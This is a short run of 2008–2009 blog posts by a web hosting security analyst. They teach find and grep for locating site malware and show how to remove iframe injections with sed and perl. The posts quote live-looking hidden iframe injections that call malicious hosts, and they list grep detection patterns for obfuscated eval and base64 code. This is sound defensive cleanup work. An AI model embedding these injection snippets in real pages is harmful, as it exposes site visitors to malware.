Monday, January 19, 2009

Basics For the New Year

It's been a while, finals are over, and I'm back from the holidays.

On to some meat! Today I'll cover some of the basics. I use these commands EVERY SINGLE DAY.

I use the standard commands to move around the filesystem. Very quickly, these are ls (list), cd (change directory), pwd (print working directory). Use the man command to find out more uses of these and flesh them out a bit.

I rely on find and grep to turn up most malware on the server. Using find, you have a large number of options. You can search for files created, modified, or accessed at a certain time, owned by certain users, with certain permissions, etc. Find is great for getting an initial file list to check further for malware. One of my most useful find tricks is:

===============================
find . -newer datefile -type f
===============================

This finds all files (-type f) newer than datefile (-newer datefile). On it's own, this command is quite useful. I combine it with:

============================================
touch -d "HH:MM:SS Day Month Year" datefile
============================================

I fill in the date using information I've gotten from the client who's site I'm investigating or from files already on the system. Usually this finds the majority of bad things on the account, but not all. Many times malware or phish sites will come zipped and tarred, and the attackers will extract them and preserve their timestamps. This makes using atime|mtime|ctime|newer difficult. For these cases (and several others) I use grep. If you're in this business and you don't know grep, you've got some learning to do. This tool is invaluable. Grep uses very powerful math (Regular Expressions http://en.wikipedia.org/wiki/Regular_expressions) to search files for patterns. Since this I work for a web hosting business, I'm usually looking for iframe injections (<iframe src=), evil eval statements (eval\(), encoded scripts (base64_decode\(|function\(p,a,c,k,e,(r|d)), javascript that shouldn't be there in general (<script src =|<script langauge=\"JavaScript\"). The strings in the parentheses in the last sentence are regular expressions grep will search for in the path I specify. See man grep for more info on the neat tricks you can do as far as specifying patterns and paths in alternate ways and output formatting, because this command is VERY versatile. Here's an example (the blog wrapped it):

======================================================
grep -i -H -R -E "<iframe src=|<script src =|<script langauge=\"JavaScript\"|eval\(base64_decode\(|function\(p,a,c,k,e,(r|d)" ./
======================================================

Don't freak, I'll explain :). We'll start with the switches:

======================================================
-i: This tells grep to treat the patterns as case-insensitive.

-H: This tells grep to output the filename the match was found in. Useful if you need to actually track down the abuse instead of just seeing it.

-R: This one's important, it tells grep to look recursively. If the path you choose is a directory grep will normally just search the files in that directory. this option makes grep search subdirectories as well.

-E: This one enables egrep-style regular expressions. It's basically a different way to describe the patterns than the standard way grep does. It's no less or more powerful, it's mostly here for versatility and compatibility. There are other switches like this, check the man page (PLEASE don't get tired of hearing me say this....).

"<sub-pattern>|<sub-pattern>|<sub-pattern>|<sub-pattern>|<sub-pattern>": This is the pattern to search for. The "|" (pipe) characters represent directives grep interprets, not actual characters to search for. Read the man to find out when and what you have to escape when sending grep directives like this, it can be confusing. The "|" directive means "or", so grep will look for any of those sub-patterns connected by the pipe. The last pattern has a pipe inside parentheses. This only applies to this sub-pattern, so it will find function(p,a,c,k,e,r or function(p,a,c,k,e,d.

./: This is the path to search. I choose the current directory via it's alias "./". This is true on most unix systems.
======================================================

Wow, what a lot to digest at once! I hope you aren't sweating yet, there's even more to learn in the man pages. We have barely scratched the surface of the uses of these two commands. The find command can run commands on every file it finds, so it can be used with grep directly! That will have to be left for another post though. Enjoy your MLKJ day!

ich1 out.

Wednesday, November 26, 2008

Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually this is an iframe injection, like 90% of the time. Sometimes its a PHP shell, but that's another blog entry. First step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches all of the iframe. I like egrep:

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line:

sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This will output thelist.txt into xargs. Xargs will run the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! We can do this by adding -i.ext to the sed command:

cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verfied the iframes are gone a piece of cake and less hazardous to your client backups.

ich1 out.

Saturday, November 22, 2008

Schools and Tools

Let's get the preliminaries out of the way:

My name is Shannon Francis, I'm a Computer Science student at a university in Florida. I also work for a web hosting company as an Abuse and Security Analyst. We get to see lots of interesting things and lots of boring, annoying ones, so I'm choosing to blog about them here.

I figure if I fix something and post about it, if someone somewhere finds it and it saves them a bit of time, I've done a mitzvah.

First lets talk about tools.

I do most of my work from a Windows XP machine. I can hear everyone out there tuning out, but bear with me. I work in an office environment and at any time may need to work from more than one computer that isn't my workstation. I chose my tools such that they match up with the majority of the boxes in the office and so that they would easily fit on a thumb drive for maximum portability and minimal hassle. I'm lazy like that :).

We use XMPP at work so I use pidgin (and OTR for encryption) to communicate with co-workers. I use Putty Connection Manager to SSH into servers and open more than one session at a time without cluttering my laptop (that's right, laptop :) too much. I use TrueCrypt to encrypt the drive storing my SSH keys and other important passwords and such. Can't overlook the importance of on-the-fly encryption, especially when you need to remain mobile (leaving valid SSH keys around is just tacky).

Sam Spade comes in handy for just about everything you could need to do before you SSH into a *nix server. I can ping, whois, dig, traceroute, etc., and we have a VPS set up at work for any *nix-y tasks we need to do from the outside of the server we're investigating. I use zenmap as opposed to plain old vanilla nmap (more people just tuned out, probably), mostly because it's what is easy and available in the Windows office environment, but honestly I don't have to use it that often.

Next post I'll talk about what command-line tools I use most and how for the first part of my job: finding the problem.

Saturday, November 15, 2008

Welcome to the Sprawl....

Abandon hope all ye who enter here....